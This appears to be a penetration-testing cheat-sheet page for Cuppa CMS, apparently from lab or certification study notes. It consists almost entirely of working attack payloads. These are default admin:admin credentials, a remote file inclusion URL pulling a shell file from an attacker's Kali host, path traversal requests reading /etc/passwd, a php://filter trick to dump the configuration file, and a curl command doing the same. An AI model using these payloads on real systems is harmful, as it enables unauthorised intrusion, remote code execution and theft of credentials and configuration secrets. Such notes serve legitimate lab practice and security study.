Cuppa CMS

Cuppa CMS

http://10.11.1.1/administrator/

Default creds → admin:admin

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://kaliIP/shelly.txt? #LFI http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd # Path traversal

#Reading /etc/passwd

http://10.11.1.1/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

#Find config files and decode base64 output

http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

#Same with curl

curl -s --data-urlencode urlConfig=../../../../../../../etc/passwd http://10.11.1.116/administrator/alerts/alertConfigField.php

PreviousOvidentia NextPhreebooks

Last updated 2 years ago